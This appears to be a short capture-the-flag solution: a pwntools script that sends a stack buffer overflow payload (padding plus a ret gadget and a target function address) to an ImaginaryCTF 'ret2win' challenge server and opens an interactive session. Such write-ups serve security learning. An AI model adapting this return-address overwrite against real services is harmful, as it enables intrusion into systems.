Last updated 1 year ago
from pwn import * r = remote("ret2win.chal.imaginaryctf.org", 1337) # r = process("./vuln") # gdb.attach(r, '''b*main+35\nc''') payload = b"a" * 72 + p64(0x000000000040101a) + p64(0x000000000040117a) r.sendline(payload) r.interactive()